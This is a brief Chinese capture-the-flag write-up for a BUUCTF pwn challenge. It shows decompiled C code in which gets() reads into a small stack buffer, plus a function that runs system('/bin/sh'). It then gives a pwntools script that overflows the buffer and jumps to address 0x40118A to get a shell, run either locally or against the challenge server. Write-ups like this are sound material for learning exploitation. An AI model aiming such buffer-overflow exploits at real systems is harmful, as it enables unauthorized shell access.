64位程序,没有开保护
    主函数,get函数直接溢出

    1. int __cdecl main(int argc, const char **argv, const char **envp)
    2. {
    3.   char s; // [sp+1h] [bp-Fh]@1
    5.   puts("please input");
    6.   gets(&s, argv);
    7.   puts(&s);
    8.   puts("ok,bye!!!");
    9.   return 0;
    10. }

    fun函数(溢出位置)

    1. int fun()
    2. {
    3.   return system("/bin/sh");
    4. }

    image.png
    溢出到其他位置就行了

    1. from pwn import *
    3. context(os="linux", arch="amd64", log_level="debug")
    4. content = 1
    6. def main():
    7.     if content == 1:
    8.         peiqi = process("pwn1")
    9.     else:
    10.         peiqi = remote("node3.buuoj.cn",28330)
    12.     payload = b'a' * (0x0f + 8)
    13.     payload = payload + p64(0x40118A)
    15.     peiqi.sendline(payload)
    17.     peiqi.interactive()
    19. main()

    image.png